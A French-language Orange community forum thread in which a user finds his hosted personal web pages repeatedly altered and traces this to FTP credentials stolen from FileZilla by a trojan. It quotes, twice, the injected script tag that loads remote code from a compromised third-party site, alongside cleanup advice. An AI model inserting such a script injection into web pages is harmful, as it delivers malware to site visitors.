Communauté Orange
Recherchez dans la Communauté

Vous avez une question ?

Interrogez la communauté

internet & fixe mes services Orange
Voir tous les sujets internet & fixe

page perso modifiée

mike22
contributeur
Posté le
‎13-01-2014 22h25
Modifié le
13/01/2014
2 534  

page perso modifiée

J'ai constraté que ma page perso sur le site Orange est periodiquement modifiée. Explications:

Je transfere (ftp) ma page sur le serveur Orange via FTP. Tout fonctionne bien.

Après environ 2 semaines je constate que l'accès à mes pages devient problématique. (virus détecté, besoin de flash pour ouvrir la page, javascript erreur ...)

 

Si je rapatrie les pages incriminées sur mon pc depuis le serveur orange, je constate que le code source (html) des pages a été modifié. ( javascript pour ouvrir URL n'ayant rien à voir avec Orange ajouté dans la section <HEAD> du code HTML.

 

Quelqu'un a t il déjà rencontré ce genre de problème?

 

Ces modifications sont elles du fait d'Orange, ou d'un piratage des serveurs Orange?

 

Merci

Voir le sujet
Répondre
0 Top
Accéder à la solution

Solutions approuvées
mike22
contributeur
Posté le
‎18-04-2014 22h54
2 290  

Re : page perso modifiée

Explication:

 

En fait ces modifications viennent d'un de mes PC qui me sert pour uploader mes pages sur le serveur Orange.

J'utilise Filezilla,  où je donne mes identifiants , password... Puis je me déconnecte une fois les pages uploadées.

Il se trouve que lorsque l'on se déconnecte, filezilla conserve les données de login.

 

Sur mon PC j'ai dû récupérer un Trojan qui test cette faille, récupère les information de login. Ensuite un serveur utilise ces informations pour venir modifier les pages web. Au départ c'était des pages genre pub', puis c'est passé à des Malwares ou Ransonware du genre Cryptor bit qui crypte tous les fichiers sur votre PC.

 

Donc un conseil: si vous utilisez Filezilla pour uploader vos fichier , surtout avant de vous deconnecter passer par le menu 'supprimer l'historique de connection', sinon par défaut les infos sont conservées sur PC.

 

Sujet clos

 

Voir la solution dans l'envoi d'origine

Voir le sujet
Répondre
0 Top
Accéder à la solution
8 RÉPONSES 8
vasco8
super fan
super fan
Posté le
‎14-01-2014 11h38
2 481  

Re : page perso modifiée

Bonjour mike

Pouvez vous nous donner l'adresse de votre site perso

Bonne journée

Voir le sujet
Répondre
0 Top
Accéder à la solution
mike22
contributeur
Posté le
‎20-01-2014 22h41
2 413  

Re : page perso modifiée

Pour simplifier j'ai mis un fichier index.htm sur le serveur Orange le 13/01:

Voici le contenu du fichier très simple (page simple qui fonctionne):

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
   <TITLE> En construction</TITLE>
   <META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (X11; I; SunOS 5.5 sun4m) [Netscape]">

 

</HEAD>


<BODY bgcolor="yellow">

<center>
<br>
<img alt=""  src="GifCom/construct_yellow.gif" style="width: 40px; height: 40px;">
<a href="Portail/indexA_123.htm">
<img alt=""  src="GifCom/construct_yellow.gif" style="width: 0px; height: 0px;">
</a></center> 

<br>
En construction
</center>


</BODY>

</HTML>

 

 

Une semaine plus tard , cette page ne fonctionne plus. Je la rapatrie sur mon PC et voici le contenu:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD><!--f025d7--><script src="http://www.amsterdambikesusa.com/wp-includes/yHzzl0nd.php?id=38175460" type="text/javascript"></script><!--/f025d7-->

   <TITLE> En construction</TITLE>
   <META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (X11; I; SunOS 5.5 sun4m) [Netscape]">

 

</HEAD>


<BODY bgcolor="yellow">

<center>
<br>
<img alt=""  src="../GifCom/construct_yellow.gif" style="width: 40px; height: 40px;">
<br>
En construction
</center>


</BODY>

</HTML>

 

 

Je constate donc que le fichier a été modifié: script javascript appelé dans section HEAD,  et lien dans le corps de la page supprimé. Ce genre de changement apparait dans plus de 80% des fichiers. De ce fait l'ouverture de certaines pages ne fonctione plus.

 

Qui a les droit pour faire de telles modifications sur le serveur Orange, à part Orange? Ou un piratage des serveurs Orange?

 

Merci

Voir le sujet
Répondre
0 Top
Accéder à la solution
mike22
contributeur
Posté le
‎18-04-2014 22h54
2 291  

Re : page perso modifiée

Explication:

 

En fait ces modifications viennent d'un de mes PC qui me sert pour uploader mes pages sur le serveur Orange.

J'utilise Filezilla,  où je donne mes identifiants , password... Puis je me déconnecte une fois les pages uploadées.

Il se trouve que lorsque l'on se déconnecte, filezilla conserve les données de login.

 

Sur mon PC j'ai dû récupérer un Trojan qui test cette faille, récupère les information de login. Ensuite un serveur utilise ces informations pour venir modifier les pages web. Au départ c'était des pages genre pub', puis c'est passé à des Malwares ou Ransonware du genre Cryptor bit qui crypte tous les fichiers sur votre PC.

 

Donc un conseil: si vous utilisez Filezilla pour uploader vos fichier , surtout avant de vous deconnecter passer par le menu 'supprimer l'historique de connection', sinon par défaut les infos sont conservées sur PC.

 

Sujet clos

 

Voir le sujet
Répondre
0 Top
Accéder à la solution
musclore
contributeur
Posté le
‎19-04-2014 9h55
2 257  

Re : page perso modifiée

merci a tous pour pour vos conseils

Voir le sujet
Répondre
0 Top
Accéder à la solution
vasco8
super fan
super fan
Posté le
‎19-04-2014 10h24
2 251  

Re : page perso modifiée

Bonjour mike

T

Voir le sujet
Répondre
0 Top
Accéder à la solution
vasco8
super fan
super fan
Posté le
‎19-04-2014 10h39
2 248  

Re : page perso modifiée

Bonjour Mike

T’en es tu sorti de ce malware car il est très tenace.

Tes pages sur le site distant sont infectés

<HEAD><!--f025d7--><script src="http://www.amsterdambikesusa.com/wp-includes/yHzzl0nd.php?id=38175460" type="text/javascript"></script><!--/f025d7-->

Utilise malwarebytes et adv cleaner

Le moyen de s’en débarrasser est de rapatrier les pages infectés du site distant.

Supprimer dans le code source cette ligne HEAD sur toutes les page.

Ensuite supprimer le site distant infecté et remettre le site nettoyé en place

 

Voir le sujet
Répondre
0 Top
Accéder à la solution
vasco8
super fan
super fan
Posté le
‎19-04-2014 10h40
2 247  

Re : page perso modifiée

 
Voir le sujet
Répondre
0 Top
Accéder à la solution
mike22
contributeur
Posté le
‎21-04-2014 21h18
2 191  

Re : page perso modifiée

Exactement, pour enlever les malware, malwarebyte est très bien.

 

Pour ce qui est du rafraichissement du site je conseille de procéder autrement:

- Conservez l'original des pages web sur votre PC. et charger les pages sur le serveur Orange quand elles sont terminées. Cela permet de charger les pages sur un autre serveur si vous en avez envie (ovh , sfr, free....)

 

- Pour remédier au probleme sur les pages , il suffit alors de recharger tout le site sur le serveur. C'est ce que je faisais, mais après 8 jours les pages étaient modifiees à nouveau. Avec le mot de passe changé et la precaution de supprimer les donnees privatives dans filezilla, les pages ne sont plus modifiees  

 

 

Voir le sujet
Répondre
0 Top
Accéder à la solution

Vous avez une question ?

Interrogez la communauté

Déjà 796656 membres inscrits 🧡

2803 personnes actuellement en ligne

Tous les membres en ligne